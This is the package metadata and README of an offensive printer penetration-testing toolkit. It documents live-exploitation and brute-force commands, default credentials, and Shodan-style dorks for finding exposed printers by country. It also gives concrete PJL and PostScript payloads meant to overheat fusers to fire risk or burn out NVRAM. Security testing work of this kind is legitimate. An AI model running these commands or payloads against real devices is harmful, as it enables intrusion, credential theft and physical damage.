printerxpl-forge 6.2.0__py3-none-any.whl

printerxpl_forge-6.2.0.dist-info/METADATA

@@ -0,0 +1,919 @@
+Metadata-Version: 2.4
+Name: printerxpl-forge
+Version: 6.2.0
+Summary: Advanced Printer Penetration Testing Toolkit — PJL, PostScript, PCL, CVE scanner, brute-force, pivot, C2 research — 185 exploit modules
+Author-email: Andre Henrique <mrhenrike@users.noreply.github.com>
+License: MIT License
+        
+        Copyright (c) 2024-2026 André Henrique (https://github.com/mrhenrike)
+        
+        Permission is hereby granted, free of charge, to any person obtaining a copy
+        of this software and associated documentation files (the "Software"), to deal
+        in the Software without restriction, including without limitation the rights
+        to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+        copies of the Software, and to permit persons to whom the Software is
+        furnished to do so, subject to the following conditions:
+        
+        The above copyright notice and this permission notice shall be included in all
+        copies or substantial portions of the Software.
+        
+        THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+        IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+        FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+        AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+        LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+        OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+        SOFTWARE.
+        
+Project-URL: Homepage, https://www.uniaogeek.com.br/printerxpl-forge
+Project-URL: Repository, https://github.com/mrhenrike/PrinterXPL-Forge
+Project-URL: Issues, https://github.com/mrhenrike/PrinterXPL-Forge/issues
+Project-URL: Wiki, https://github.com/mrhenrike/PrinterXPL-Forge/wiki
+Project-URL: Changelog, https://github.com/mrhenrike/PrinterXPL-Forge/releases
+Keywords: printer,penetration-testing,pjl,postscript,pcl,security,exploitation,iot,hacking,printer-security,snmp,ipp,pret,network-printer
+Classifier: Development Status :: 5 - Production/Stable
+Classifier: Environment :: Console
+Classifier: Intended Audience :: Information Technology
+Classifier: Intended Audience :: System Administrators
+Classifier: Topic :: Security
+Classifier: Topic :: System :: Networking
+Classifier: License :: OSI Approved :: MIT License
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.8
+Classifier: Programming Language :: Python :: 3.9
+Classifier: Programming Language :: Python :: 3.10
+Classifier: Programming Language :: Python :: 3.11
+Classifier: Programming Language :: Python :: 3.12
+Classifier: Programming Language :: Python :: 3.13
+Classifier: Operating System :: OS Independent
+Classifier: Operating System :: POSIX :: Linux
+Classifier: Operating System :: Microsoft :: Windows
+Classifier: Operating System :: MacOS
+Requires-Python: >=3.8
+Description-Content-Type: text/markdown
+License-File: LICENSE
+Requires-Dist: requests>=2.31.0
+Requires-Dist: urllib3>=2.0.0
+Requires-Dist: colorama>=0.4.6
+Requires-Dist: pysnmp-lextudio>=5.0.31
+Requires-Dist: pyasn1<0.6,>=0.4.8
+Requires-Dist: PyYAML>=6.0
+Provides-Extra: smb
+Requires-Dist: pysmb>=1.2.9; extra == "smb"
+Requires-Dist: impacket>=0.12.0; extra == "smb"
+Provides-Extra: osint
+Requires-Dist: shodan>=1.28.0; extra == "osint"
+Requires-Dist: censys>=2.2.0; extra == "osint"
+Provides-Extra: ml
+Requires-Dist: scikit-learn>=1.3.0; extra == "ml"
+Requires-Dist: joblib>=1.3.0; extra == "ml"
+Provides-Extra: dev
+Requires-Dist: pytest>=7.0.0; extra == "dev"
+Requires-Dist: pytest-timeout>=2.1.0; extra == "dev"
+Requires-Dist: build>=1.0.0; extra == "dev"
+Requires-Dist: twine>=5.0.0; extra == "dev"
+Provides-Extra: nse
+Provides-Extra: full
+Requires-Dist: pysmb>=1.2.9; extra == "full"
+Requires-Dist: impacket>=0.12.0; extra == "full"
+Requires-Dist: shodan>=1.28.0; extra == "full"
+Requires-Dist: censys>=2.2.0; extra == "full"
+Requires-Dist: scikit-learn>=1.3.0; extra == "full"
+Requires-Dist: joblib>=1.3.0; extra == "full"
+Dynamic: license-file
+
+<div align="center">
+
+# PrinterXPL-Forge
+
+*Advanced Printer Penetration Testing Toolkit*
+
+**Discover · Fingerprint · Exploit · Pivot · Report**
+
+[![Python](https://img.shields.io/badge/Python-3.8%2B-blue)](https://python.org)
+[![License](https://img.shields.io/badge/License-MIT-green)](LICENSE)
+[![GitHub](https://img.shields.io/badge/GitHub-mrhenrike-black?logo=github)](https://github.com/mrhenrike/PrinterXPL-Forge)
+[![Wiki](https://img.shields.io/badge/Wiki-English-orange)](https://github.com/mrhenrike/PrinterXPL-Forge/wiki)
+[![Wiki PT-BR](https://img.shields.io/badge/Wiki-Portugu%C3%AAs-green)](https://github.com/mrhenrike/PrinterXPL-Forge/wiki/Home-pt-BR)
+[![Version](https://img.shields.io/badge/version-6.2.0-red)](https://github.com/mrhenrike/PrinterXPL-Forge/releases)
+
+> **"Is your printer safe from the void? Find out before someone else does."**
+
+**[Wiki (en-us)](https://github.com/mrhenrike/PrinterXPL-Forge/wiki)** · **[Wiki (pt-br)](https://github.com/mrhenrike/PrinterXPL-Forge/wiki/Home-pt-BR)** · **[Issues](https://github.com/mrhenrike/PrinterXPL-Forge/issues)** · **[Releases](https://github.com/mrhenrike/PrinterXPL-Forge/releases)** · **[CONTRIBUTING](CONTRIBUTING.md)** · **[CODE_OF_CONDUCT](CODE_OF_CONDUCT.md)** · **[README (pt-BR)](README.pt-BR.md)**
+
+</div>
+
+---
+
+PrinterXPL-Forge is a complete, modular framework for security assessment of network printers. It covers all major printer languages (PJL, PostScript, PCL, ESC/P), all common protocols (RAW, IPP, LPD, SMB, HTTP, SNMP, FTP, Telnet, WSD, TFTP), **185 exploit modules**, an external wordlist-driven credential engine with zero hardcoded passwords, ML-assisted fingerprinting, NVD/CVE integration (120 CVEs), automated lateral movement, firmware analysis, and Cross-Site Printing payloads. Multi-language exploit orchestration (Python, C/C++ via WSL gcc, Ruby/Metasploit, Go, Rust) is handled by the built-in `poly_runner` engine.
+
+---
+
+## Architecture — Printer Attack Surface
+
+![Printer Attack Surface](img/printer_architecture.png)
+
+---
+
+## Operational Workflow
+
+![PrinterXPL-Forge Workflow](img/PrinterXPL-Forge_workflow.png)
+
+> Flow source files (editable in [draw.io](https://app.diagrams.net)): `diagrams/PrinterXPL-Forge_workflow.drawio` · `diagrams/credential_flow.drawio` · `diagrams/attack_matrix.drawio`
+
+---
+
+## Attack Coverage Matrix
+
+![Attack Coverage Matrix](img/attack_coverage_matrix.png)
+
+---
+
+## Destructive / Irreversible Attacks
+
+> **WARNING — FOR AUTHORIZED LAB USE ONLY.**  
+> The attacks below cause **permanent, irreversible hardware damage**. They are implemented for security research and authorized penetration testing exclusively. Operators bear full legal and physical safety responsibility.
+
+PrinterXPL-Forge includes a dedicated **Destructive Attack Audit** mode that scans any target printer for all known irreversible attack vectors:
+
+```bash
+# Assess-only (dry-run — SAFE, no payloads sent)
+python src/main.py 192.168.1.100 --destructive-audit
+
+# Live execution — sends destructive payloads (AUTHORIZED LAB ONLY)
+python src/main.py 192.168.1.100 --destructive-audit --no-dry
+
+# Specific modules only
+python src/main.py 192.168.1.100 --destructive-audit \
+  --destructive-modules research-fuser-thermal-attack,research-brother-nvram
+
+# Interactive menu: choose option [D] DESTRUCTIVE AUDIT
+python src/main.py
+```
+
+### Implemented Physical Destruction Modules
+
+| Module | Attack | Damage Class | Vendors |
+|--------|--------|-------------|---------|
+| `research-fuser-thermal-attack` | PJL SET FUSETEMP / PS setpagedevice /FuserTemperature override → thermal runaway | **PHYSICAL — Fire risk** | HP, Kyocera, Ricoh, Xerox |
+| `research-motor-jam-attack` | HP PML DMCMD motor commands / duplex-stress cycling → gear strip / roller burnout | **PHYSICAL — Mechanical** | HP, Ricoh, Generic |
+| `research-laser-scanner-attack` | PS setscreen 9999 lpi + all-black flood / HP PML laser power 0xFF → diode/drum burn | **PHYSICAL — Optical** | HP, Xerox, Ricoh, Canon |
+| `research-pjl-nvram-damage` | PJL DEFAULT COPIES loop → NVRAM write-cycle exhaustion (~100k cycles) | **NVRAM Brick** | HP, Brother, Konica, Lexmark |
+| `research-brother-nvram` | PJL COLLATE ON/OFF × 200,000 iterations → permanent chip burnout | **NVRAM Brick** | Brother |
+| `research-generic-pjl-nvram` | PJL DINQUIRE/SET VARIABLE access → NVRAM read + optional write | **NVRAM Risk** | HP, Lexmark, Dell |
+| `research-snmp-factory-reset` | SNMP prtGeneralReset OID = 6 (no auth) → complete factory wipe | **Config Wipe** | Multi-vendor |
+| `research-xerox-pjl-dlm` | @PJL DLM START → firmware download manager activation | **Firmware Brick** | Xerox |
+| `research-xerox-firmware-root` | HTTP POST /FirmwareUpdate with crafted DLM → rootkit / brick | **Firmware Brick** | Xerox |
+| `edb-45273` (CVE-2017-2741) | PJL FSDOWNLOAD to /etc/profile.d/ + SNMP restart → persistent root | **Firmware Root** | HP PageWide/OfficeJet |
+
+### Physical Damage Details
+
+**Fuser Thermal Attack** — The fuser unit operates at 170–210°C. PJL commands like `@PJL SET FUSETEMP=270` (or PostScript `<< /FuserTemperature 270 >> setpagedevice`) push the temperature above the roller material's thermal tolerance. At >270°C, the PTFE fuser sleeve melts; at >285°C, paper residue inside the fuser can ignite.
+
+**Motor Jamming** — HP's PML DMCMD interface (service manual) allows direct motor activation. Sending simultaneous commands to mechanically exclusive motors (main feed + pickup + exit) without paper in the path causes gear binding, stripping the plastic drive train.
+
+**Laser Scanner Attack** — PostScript `setscreen` with frequency 9999 lpi forces the laser diode to fire at 100% duty cycle continuously. This accelerates diode degradation, overheats the polygon mirror motor bearings, and ablates the photosensitive drum coating — permanently degrading print quality or bricking the LSU.
+
+---
+
+## Credential Architecture — Zero Hardcoded Passwords
+
+![Credential Wordlist Flow](img/credential_wordlist_flow.png)
+
+---
+
+## PrinterXPL-Forge vs PRET — Benchmark
+
+[PRET](https://github.com/RUB-NDS/PRET) (Printer Exploitation Toolkit) is the reference tool from the BlackHat 2017 research by Müller et al. PrinterXPL-Forge was initially forked from it and has since been rewritten and massively extended.
+
+| Feature | PRET | PrinterXPL-Forge v5.0.0 |
+|---------|------|----------------------|
+| **Languages** | PJL, PS, PCL | PJL, PS, PCL, ESC/P, auto |
+| **Protocols** | RAW, LPD, IPP, USB | RAW, LPD, IPP, SMB, HTTP, SNMP, FTP, Telnet |
+| **CVE Database** | None | 90+ CVEs built-in + NVD API live lookup |
+| **Exploit Library** | None | **150 modules** (ExploitDB 25, Metasploit 19, Research 80, Core 26) — 110 CVEs catalogued |
+| **Brute-Force** | None | HTTP, FTP, SNMP, Telnet — wordlist-driven, 0 hardcoded creds |
+| **Credential Engine** | None | External wordlists, vendor sections, token expansion, variations |
+| **Network Discovery** | None | SNMP sweep, Shodan, Censys, WSD, installed printers |
+| **Fingerprinting** | Basic banner | Multi-protocol banner grab + ML classifier |
+| **CVE Scan** | None | NVD API + offline fallback + auto exploit matching |
+| **ML Engine** | None | scikit-learn fingerprinting + attack scoring |
+| **Lateral Movement** | None | SSRF via IPP/WSD, network map, LDAP NTLM hash capture |
+| **Firmware Analysis** | None | Version extraction, upload endpoint check, NVRAM r/w |
+| **Storage Audit** | None | FTP, web file manager, SNMP MIB dump, saved jobs |
+| **Cross-Site Printing** | None | XSP + CORS spoofing payload generator (5 attack types) |
+| **Attack Matrix** | None | Full BlackHat 2017 campaign + 2024-2025 CVEs |
+| **Send Print Job** | Partial | Any format: .ps/.pcl/.pdf/.txt/.png/.jpg/.doc + raw |
+| **Interactive Menu** | None | Full guided TUI with next-steps and hints |
+| **Config / API Keys** | None | config.json with Shodan, Censys, NVD, ML flags |
+| **Python Version** | 2.7 (legacy) | 3.8+ (typed, async-capable) |
+| **Windows Support** | Limited | Full (PowerShell launchers, EDR-safe venv) |
+| **IPv6** | No | Yes |
+| **SMB** | No | Yes (pysmb) |
+| **Wiki / Docs** | Basic README | Full GitHub wiki + draw.io diagrams |
+
+**Summary:** PrinterXPL-Forge covers the same core PJL/PS/PCL shell as PRET plus a complete post-exploitation, discovery, brute-force, CVE, and lateral movement framework on top.
+
+---
+
+## Installation
+
+```bash
+git clone https://github.com/mrhenrike/PrinterXPL-Forge.git
+cd PrinterXPL-Forge
+
+python -m venv .venv
+source .venv/bin/activate        # Linux / macOS
+.venv\Scripts\activate           # Windows PowerShell
+
+pip install -r requirements.txt
+python printerxpl-forge.py --version
+# → PrinterXPL-Forge Version 3.7.0 (2026-03-25)
+```
+
+**Requirements:** Python 3.8+ · Windows / Linux / macOS · 80 MB disk
+
+---
+
+## Entry Point
+
+```bash
+python printerxpl-forge.py [target] [mode] [options]
+```
+
+| Example | What it does |
+|---------|-------------|
+| `python printerxpl-forge.py` | Interactive guided menu |
+| `python printerxpl-forge.py --help` | Full flag reference |
+| `python printerxpl-forge.py 192.168.1.100 --scan` | Passive fingerprint + CVE scan |
+| `python printerxpl-forge.py 192.168.1.100 pjl` | PJL interactive shell |
+| `python printerxpl-forge.py 192.168.1.100 --bruteforce --bf-vendor epson` | Credential brute-force |
+| `python printerxpl-forge.py 192.168.1.100 --auto-exploit` | Auto exploit selection + execution |
+| `python printerxpl-forge.py 192.168.1.100 --attack-matrix` | Full attack campaign |
+| `python printerxpl-forge.py --discover-online --shodan --dork-vendor hp --dork-country BR` | Dork discovery via Shodan only |
+| `python printerxpl-forge.py --discover-online --dork-engine shodan,netlas --dork-vendor hp,epson --dork-country BR,AR` | Multi-engine, multi-vendor CSV |
+| `python printerxpl-forge.py --discover-online --dork-vendor hp --dork-country BR` | Dork discovery via all configured engines |
+
+---
+
+## Custom Port Overrides
+
+By default PrinterXPL-Forge uses standard printer port numbers for each protocol. When the target printer listens on non-standard ports, override them globally via CLI flags — all modules automatically pick up the new ports:
+
+```bash
+# Printer with RAW on 3910 instead of 9100
+python printerxpl-forge.py 192.168.1.100 pjl --port-raw 3910
+
+# Full scan on a printer with non-standard ports
+python printerxpl-forge.py 192.168.1.100 --scan \
+  --port-raw 3910 \
+  --port-ipp 8631 \
+  --port-snmp 1161
+
+# Add extra ports to banner scan sweep
+python printerxpl-forge.py 192.168.1.100 --scan \
+  --extra-ports 9200 --extra-ports 7100
+
+# Brute-force with custom HTTP and FTP ports
+python printerxpl-forge.py 192.168.1.100 --bruteforce \
+  --port-http 8080 --port-ftp 2121 --port-telnet 2323
+
+# Attack campaign respects all overrides
+python printerxpl-forge.py 192.168.1.100 --attack-matrix --port-raw 3910
+```
+
+**Port override flags:**
+
+| Flag | Protocol | Default |
+|------|----------|---------|
+| `--port-raw PORT` | RAW/PJL/JetDirect | 9100 |
+| `--port-ipp PORT` | IPP | 631 |
+| `--port-lpd PORT` | LPD/LPR | 515 |
+| `--port-snmp PORT` | SNMP | 161 |
+| `--port-ftp PORT` | FTP management | 21 |
+| `--port-http PORT` | HTTP (EWS) | 80 |
+| `--port-https PORT` | HTTPS (EWS) | 443 |
+| `--port-smb PORT` | SMB/CIFS | 445 |
+| `--port-telnet PORT` | Telnet management | 23 |
+| `--extra-ports PORT` | Extra scan port (repeatable) | — |
+
+Overrides are applied globally at startup — every module (banner scan, PJL, firmware, SNMP, FTP, brute-force, attack orchestrator, XSP payload) reads from `PortConfig` instead of using hardcoded constants.
+
+---
+
+## 1. Discovery
+
+### Local
+
+```bash
+# SNMP sweep + installed printers on this host
+python printerxpl-forge.py --discover-local
+
+# Passive OSINT check for a specific IP
+python printerxpl-forge.py 192.168.1.100 --osint
+
+# Detect supported languages without connecting
+python printerxpl-forge.py 192.168.1.100 --auto-detect
+```
+
+### Online — Structured Dork Discovery (v3.12.0+)
+
+`--discover-online` supports 5 search engines: **Shodan, Censys, FOFA, ZoomEye, Netlas**.
+**Printer context is always implicit** — no need to specify "printer" in searches.
+**At least one `--dork-*` filter is required** — unfiltered global sweeps are blocked.
+**No engine runs without credentials** — configure keys in `config.json`.
+
+```bash
+# All Epson + Ricoh printers in Latin America, port 515 — all engines
+python printerxpl-forge.py --discover-online \
+  --dork-vendor epson,ricoh \
+  --dork-region latin_america \
+  --dork-port 515
+
+# HP DeskJet Pro 5500 in Brazil — Shodan only (single engine flag)
+python printerxpl-forge.py --discover-online --shodan \
+  --dork-vendor hp \
+  --dork-model "deskjet pro 5500" \
+  --dork-country BR
+
+# All printers in São Paulo port 9100 (CSV + single-country city filter)
+python printerxpl-forge.py --discover-online \
+  --dork-country BR \
+  --dork-city "Sao Paulo","Rio de Janeiro" \
+  --dork-port 9100
+
+# Kyocera in Europe, 200 results — Netlas only
+python printerxpl-forge.py --discover-online --netlas \
+  --dork-vendor kyocera \
+  --dork-region europe \
+  --dork-limit 200
+
+# Multiple vendors and countries via CSV — Shodan + ZoomEye (multi-engine)
+python printerxpl-forge.py --discover-online \
+  --dork-engine shodan,zoomeye \
+  --dork-vendor hp,canon \
+  --dork-country BR,AR \
+  --dork-port 9100,631
+
+# Five engines at once
+python printerxpl-forge.py --discover-online \
+  --dork-engine shodan,censys,fofa,zoomeye,netlas \
+  --dork-vendor epson --dork-port 9100
+```
+
+**Engine selection rules:**
+
+| Goal | How |
+|------|-----|
+| ONE engine | `--shodan` / `--censys` / `--fofa` / `--zoomeye` / `--netlas` |
+| MULTIPLE engines | `--dork-engine shodan,netlas` (comma-separated — the **only** multi-engine way) |
+| ALL configured | Omit all engine flags |
+| Forbidden | `--shodan --fofa` (two individual flags) or `--shodan --dork-engine fofa` (mix) → error |
+
+**Dork filter flags — all accept CSV or repeated flags:**
+
+| Flag | Multi-value | Description |
+|------|------------|-------------|
+| `--dork-vendor hp,epson` | Yes — CSV or repeat | Vendor: hp, epson, ricoh, brother, canon, kyocera, xerox, lexmark, samsung, oki, zebra |
+| `--dork-model MODEL` | No | Model substring in banner |
+| `--dork-country BR,AR,US` | Yes — CSV or repeat | ISO-2 code or name: BR, brazil, argentina, DE |
+| `--dork-city "São Paulo",Belém` | Yes — **only with 1 country** | City names; compound names must be quoted |
+| `--dork-region latin_america,europe` | Yes — CSV or repeat | Region: latin\_america, south\_america, europe, eastern\_europe, asia, southeast\_asia, middle\_east, africa, oceania, north\_america |
+| `--dork-port 9100,515,631` | Yes — CSV or repeat | 9100 (RAW/PJL), 515 (LPD), 631 (IPP), 80 (HTTP), 443 (HTTPS) |
+| `--dork-org ORG` | No | Organization/ISP name |
+| `--dork-cpe CPE` | No | CPE filter (Censys/Netlas) |
+| `--dork-limit N` | No | Max results per query per engine (default: 100) |
+
+**Query syntax generated per engine (implicit + your filters):**
+
+| Engine | Example generated query |
+|--------|------------------------|
+| Shodan | `"HP LaserJet" country:BR port:9100` |
+| Censys | `services.banner="HP LaserJet" AND location.country_code="BR" AND services.port=9100` |
+| FOFA | `banner="HP LaserJet" && country="BR" && port="9100"` |
+| ZoomEye | `banner:"HP LaserJet" +country:"BR" +port:9100` |
+| Netlas | `data.response:"HP LaserJet" AND geo.country_code:"BR" AND port:9100` |
+
+---
+
+## 2. Reconnaissance
+
+```bash
+# Full passive scan: banner grab + CVE/NVD lookup + exploit matching
+python printerxpl-forge.py 192.168.1.100 --scan
+
+# Same + ML fingerprinting and attack scoring
+python printerxpl-forge.py 192.168.1.100 --scan-ml
+
+# Offline (skip NVD API)
+python printerxpl-forge.py 192.168.1.100 --scan --no-nvd
+
+# Scan + immediately match exploit modules
+python printerxpl-forge.py 192.168.1.100 --scan --xpl
+
+# Combined: scan auto-populates vendor + serial for bruteforce
+python printerxpl-forge.py 192.168.1.100 --scan --bruteforce
+```
+
+---
+
+## 3. Interactive Shell
+
+```bash
+# Auto-detect best language
+python printerxpl-forge.py 192.168.1.100 auto
+
+# Specific languages
+python printerxpl-forge.py 192.168.1.100 pjl       # PJL: filesystem, NVRAM, control
+python printerxpl-forge.py 192.168.1.100 ps        # PostScript: operators, job capture
+python printerxpl-forge.py 192.168.1.100 pcl       # PCL: macro filesystem
+
+# Debug, batch, log modes
+python printerxpl-forge.py 192.168.1.100 pjl --debug
+python printerxpl-forge.py 192.168.1.100 pjl -i commands.txt -o session.log -q
+```
+
+**Key PJL commands:**
+
+```bash
+192.168.1.100:/> id              # model, firmware, serial
+192.168.1.100:/> network         # IP, gateway, DNS, WINS, MAC
+192.168.1.100:/> ls /            # filesystem listing
+192.168.1.100:/> cat /etc/passwd # read file
+192.168.1.100:/> download /webServer/config/soe.xml
+192.168.1.100:/> nvram read      # NVRAM dump
+192.168.1.100:/> display "HACKED"
+192.168.1.100:/> destroy         # NVRAM damage (lab only)
+```
+
+---
+
+## 4. Auto Exploit (v3.8.0)
+
+Automatic exploit selection, verification, parameter pre-filling, and execution.
+
+```bash
+# Auto exploit (dry-run — safe)
+python printerxpl-forge.py 192.168.1.100 --auto-exploit
+
+# With serial number pre-filled to exploits that require it
+python printerxpl-forge.py 192.168.1.100 --auto-exploit --bf-serial XAABT77481
+
+# Live exploitation — AUTHORIZED LABS ONLY
+python printerxpl-forge.py 192.168.1.100 --auto-exploit --no-dry
+
+# Restrict to a specific source
+python printerxpl-forge.py 192.168.1.100 --auto-exploit --xpl-source exploit-db
+
+# Check more candidates, run top 3
+python printerxpl-forge.py 192.168.1.100 --auto-exploit \
+  --auto-exploit-limit 15 \
+  --auto-exploit-run 3
+
+# Force a custom exploit file (parameters auto-filled)
+python printerxpl-forge.py 192.168.1.100 --auto-exploit \
+  --auto-exploit-file /path/to/my_exploit.py \
+  --bf-serial XAABT77481
+```
+
+**Algorithm:**
+1. Quick fingerprint (banner grab, SNMP, HTTP, IPP)
+2. Match exploit modules against detected make/model/firmware/CVEs
+3. Sort candidates by CVSS score descending
+4. Run non-destructive `check()` on top N candidates
+5. Pre-fill `host`, `port`, `serial`, `mac`, `vendor` automatically
+6. Execute `run()` on top confirmed-vulnerable exploit(s)
+7. Print ranked summary of all checked exploits
+
+---
+
+## 5. Credential Brute-Force
+
+```bash
+# Auto-detect vendor, use default wordlist
+python printerxpl-forge.py 192.168.1.100 --bruteforce
+
+# Explicit vendor + serial (Epson / HP / Canon)
+python printerxpl-forge.py 192.168.1.100 --bruteforce --bf-vendor epson --bf-serial XAABT77481
+
+# MAC-based tokens (OKI, Brother, Kyocera KR2)
+python printerxpl-forge.py 192.168.1.100 --bruteforce --bf-vendor oki --bf-mac AA:BB:CC:DD:EE:FF
+
+# Custom wordlist (replaces default)
+python printerxpl-forge.py 192.168.1.100 --bruteforce --bf-wordlist /path/to/creds.txt
+
+# Add individual credentials (highest priority)
+python printerxpl-forge.py 192.168.1.100 --bruteforce --bf-cred admin:MyPass --bf-cred root:
+
+# No variation engine (faster)
+python printerxpl-forge.py 192.168.1.100 --bruteforce --bf-no-variations --bf-delay 2.0
+```
+
+**Protocols tested:** HTTP/HTTPS · FTP · SNMP community strings · Telnet
+
+**Wordlist format:**
+```
+# ── Epson ──────────────────────────────────────────────────────────────────
+admin:epson
+admin:__SERIAL__      # expanded to --bf-serial value at runtime
+# ── HP ─────────────────────────────────────────────────────────────────────
+Admin:Admin
+jetdirect:
+admin:hpinvent!
+```
+
+---
+
+## 5. Exploit Library
+
+```bash
+# List all 150 modules sorted by CVSS
+python printerxpl-forge.py 192.168.1.100 --xpl-list
+python printerxpl-forge.py 192.168.1.100 --xpl-list --xpl-source exploit-db
+
+# Non-destructive vulnerability check
+python printerxpl-forge.py 192.168.1.100 --xpl-check edb-35151
+python printerxpl-forge.py 192.168.1.100 --xpl-check edb-cve-2024-51978
+
+# Run exploit (dry-run default)
+python printerxpl-forge.py 192.168.1.100 --xpl-run edb-35151
+python printerxpl-forge.py 192.168.1.100 --xpl-run edb-35151 --no-dry  # live
+
+# Download exploit from ExploitDB
+python printerxpl-forge.py --xpl-fetch 45273
+
+# Rebuild index after adding modules
+python printerxpl-forge.py --xpl-update
+```
+
+### New HIGH/CRITICAL Modules Added in v6.1.0
+
+| Module ID | CVE(s) | CVSS | Vendor | Type |
+|---|---|---|---|---|
+| `research-hp-printing-shellz` | CVE-2021-39238 | 9.8 | HP | Wormable RCE (FutureSmart BOF) |
+| `research-hp-bof-series-2022` | CVE-2022-28721 / CVE-2023-1329 / CVE-2024-0794 | 9.8 | HP | Network BOF series |
+| `edb-cve-2021-3441` | CVE-2021-3441 | 7.4 | HP | Stored XSS via unauthenticated PUT |
+| `research-ssport-lpe` | CVE-2021-3438 | 7.8 | HP/Samsung/Xerox | Windows kernel LPE (SSPORT.SYS) |
+| `research-canon-xps-bof-2025b` | CVE-2025-14234 / CVE-2025-14237 | 9.8 | Canon | XPS BOF (advisory CP2026-001) |
+| `research-lexmark-ps-bof-50734` | CVE-2023-50734 | 9.0 | Lexmark | PS interpreter stack BOF |
+| `research-lexmark-ps-bof-50736` | CVE-2023-50736 | 9.0 | Lexmark | PS memory corruption |
+| `research-lexmark-fw-downgrade` | CVE-2023-50738 | 8.8 | Lexmark | Firmware downgrade → RCE |
+
+### New HIGH/CRITICAL Modules Added in v6.2.0 (EmbedXPL Absorption)
+
+| Module ID | CVE(s) | CVSS | Vendor | Type |
+|---|---|---|---|---|
+| `research-hp-fw-auth-bypass-2023-6018` | CVE-2023-6018 | **9.8** | HP | FW Auth Bypass + Upload |
+| `research-hp-uart-bof-2022-3942` | CVE-2022-3942 | **9.8** | HP | UART BOF / RCE |
+| `research-hp-pagewide-ssrf-2017-2750` | CVE-2017-2750 | **9.8** | HP | Solution Bundle RCE/SSRF |
+| `research-hp-mfp-bof-2021-39237` | CVE-2021-39237 | **9.8** | HP | MFP Stack BOF (Printing Shellz) |
+| `edb-cve-2011-4065` | CVE-2011-4065 | **9.8** | HP | Web JetAdmin Unauth RCE |
+| `research-hp-pjl-traversal-2010-4107` | CVE-2010-4107 | 7.8 | HP | PJL Dir Traversal |
+| `research-hp-ews-ssrf-2024-4479` | CVE-2024-4479 | 8.6 | HP | EWS SSRF |
+| `research-hp-efi-rootkit` | — | 9.0 | HP | EFI/UEFI Rootkit (Printing Shellz) |
+| `research-hp-disk-access` | — | 7.5 | HP | Internal HDD Access via EWS |
+| `research-lexmark-ssrf-rce-2023-23560` | CVE-2023-23560 | **9.0** | Lexmark | SSRF→RCE (Pwn2Own Toronto '22) |
+| `research-ricoh-http-bof-2024-34161` | CVE-2024-34161 | **9.8** | Ricoh | HTTP Stack BOF |
+| `research-ricoh-ews-rce-2024-34161` | CVE-2024-34161 | **9.8** | Ricoh | EWS CGI RCE |
+| `research-ricoh-driver-lpe-2019-19363` | CVE-2019-19363 | 7.8 | Ricoh | Windows Driver LPE |
+| `research-xerox-altalink-unauth-2022-23968` | CVE-2022-23968 | **9.8** | Xerox | AltaLink Unauth Admin API |
+| `research-kyocera-pjl-creds` | — | 7.5 | Kyocera | PJL Credential Extraction |
+| `research-cups-pwn2own-2026-chain` | CVE-2026-34480 | **9.8** | CUPS | Pwn2Own 2026 Full Chain |
+| `research-cups-pwn2own-2026-stage1` | CVE-2026-34477 | **9.8** | CUPS | UAF Stage 1 |
+| `research-cups-pwn2own-2026-stage2` | CVE-2026-34478 | **9.8** | CUPS | Heap Spray Stage 2 |
+| `research-cups-pwn2own-2026-stage3` | CVE-2026-34479 | **9.8** | CUPS | ROP Chain Stage 3 |
+| `research-cups-chain-2026-34980` | CVE-2026-34980 | **9.8** | CUPS | CRLF Injection RCE |
+| `research-zerologon-printserver` | CVE-2020-1472 | **10.0** | Microsoft | ZeroLogon via Print Server |
+| `research-printer-c2-dns` | — | 7.5 | Generic | C2 via DNS Tunnel |
+| `research-printer-c2-http` | — | 7.5 | Generic | C2 via HTTP Polling |
+| `research-printer-c2-smb` | — | 8.0 | Generic | C2 via SMB/MS-RPRN |
+| `research-printer-iot-lateral` | — | 8.0 | Generic | Printer-as-Pivot Lateral Movement |
+| `research-printer-net-reconn` | — | 5.3 | Generic | Network Recon from Printer |
+| `research-smb-auth-relay-print` | — | 8.1 | Generic | SMB NTLM Relay via Spooler |
+| `research-universal-printer-enum` | — | — | Generic | Multi-protocol Fingerprinting |
+| `research-ps-lang-abuse` | — | 7.8 | Generic | PostScript Dict Abuse |
+| `research-ps-overlay-watermark` | — | 5.5 | Generic | PS Watermark Injection |
+| `research-print-track-steg` | — | — | Generic | MIC Tracking Dots Forensics |
+| `research-rfid-badge-exfil` | — | 7.5 | Generic | RFID Badge Data Exfil |
+| `research-smartcard-printer-bypass` | — | 8.0 | Generic | Smartcard/CAC Bypass |
+| `research-thermal-printer-rprint` | — | 6.5 | Epson/Star | Thermal Printer Remote Print |
+| `research-printer-fw-tamper` | — | 9.0 | Generic | Firmware Tampering Research |
+| `research-lexmark-heap-bof` | CVE-2024-11345 | 7.3 | Lexmark | Heap BOF via multipart upload |
+| `research-lexmark-pwn2own-2026` | CVE-2025-65079/65080/65081 | 8.8 | Lexmark | Pwn2Own 2026 heap BOF chain |
+| `research-ricoh-http-bof` | CVE-2024-47939 | 7.7 | Ricoh/Konica Minolta | Web Image Monitor stack BOF |
+| `research-xerox-ipp-bof` | CVE-2019-13165 / CVE-2019-13168 | 8.1 | Xerox | Unauthenticated IPP BOF |
+| `research-xerox-http-bof` | CVE-2019-13169 / CVE-2019-13172 | 8.1 | Xerox | HTTP header/cookie BOF |
+| `edb-cve-2016-11061` | CVE-2016-11061 | 9.8 | Xerox | WorkCentre configrui.php unauthenticated RCE |
+| `research-brother-wsd-ssrf` | CVE-2024-51980 / CVE-2024-51981 | 7.5 | Brother | WSD forced TCP / SSRF |
+| `research-brother-wsd-dos` | CVE-2024-51983 | 7.5 | Brother | WSD device crash DoS |
+| `research-brother-passback` | CVE-2024-51984 | 7.1 | Brother | LDAP/SMTP credential pass-back |
+| `edb-cve-2023-3710` | CVE-2023-3710 | 8.8 | Honeywell | PM43 command injection (EDB-51885) |
